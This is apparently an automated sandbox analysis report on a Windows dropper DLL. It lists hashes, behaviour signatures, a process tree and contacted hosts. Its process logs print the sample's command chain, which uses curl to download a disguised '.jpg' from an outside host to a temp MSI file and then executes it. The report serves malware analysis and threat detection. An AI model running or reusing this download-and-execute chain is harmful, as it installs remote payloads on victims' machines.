Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe (renamed file extension from exe to dll)
Analysis ID: 756307
MD5: 977f29431f9233f22f51b3d27e8abc28
SHA1: 7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256: b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags: exe
Infos:

Detection

Score: 2
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sample execution stops while process was sleeping (likely an evasion)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Creates a process in suspended mode (likely to inject code)

Classification

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.12.dr
Source: unknown DNS traffic detected: queries for: anydesk10.hospedagemdesites.ws
Source: global traffic HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
Source: global traffic HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
Source: global traffic HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
Source: curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg
Source: cmd.exe, 00000005.00000002.312230580.000002F48A740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.312615492.0000025D5B2C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.314800313.0000017F1AD40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
Source: curl.exe, 0000000B.00000002.312202696.000001DCAC560000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311774782.00000213305C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
Source: curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg4
Source: curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg8
Source: C:\Windows\System32\curl.exe File created: C:\Users\user\AppData\Local\Temp\spclwow78x.msi Jump to behavior
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: classification engine Classification label: clean2.winDLL@35/4@3/1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3972:120:WilError_01
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.12.dr
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\loaddll64.exe TID: 2312 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: curl.exe, 0000000B.00000003.312004880.000001DCAC56F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.312222162.000001DCAC572000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314228700.0000025DD86AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 756307 Sample: SecuriteInfo.com.Win64.Drop... Startdate: 30/11/2022 Architecture: WINDOWS Score: 2 8 loaddll64.exe 1 2->8         started        process3 10 cmd.exe 1 8->10         started        12 rundll32.exe 8->12         started        14 rundll32.exe 8->14         started        16 conhost.exe 8->16         started        process4 18 rundll32.exe 10->18         started        20 cmd.exe 12->20         started        22 cmd.exe 12->22         started        24 cmd.exe 14->24         started        26 cmd.exe 14->26         started        process5 28 cmd.exe 1 18->28         started        30 cmd.exe 1 18->30         started        32 curl.exe 2 20->32         started        35 conhost.exe 20->35         started        37 conhost.exe 22->37         started        39 curl.exe 1 24->39         started        41 conhost.exe 24->41         started        43 conhost.exe 26->43         started        dnsIp6 45 curl.exe 1 28->45         started        48 conhost.exe 28->48         started        50 conhost.exe 30->50         started        52 anydesk10.hospedagemdesites.ws 191.252.51.12, 49699, 49700, 49701 LocawebServicosdeInternetSABR Brazil 32->52 process7 dnsIp8 54 anydesk10.hospedagemdesites.ws 45->54
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
191.252.51.12
 anydesk10.hospedagemdesites.ws Brazil
27715 LocawebServicosdeInternetSABR false

Contacted Domains

Name IP Active
anydesk10.hospedagemdesites.ws 191.252.51.12 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://anydesk10.hospedagemdesites.ws/UIServices.jpg false
    		high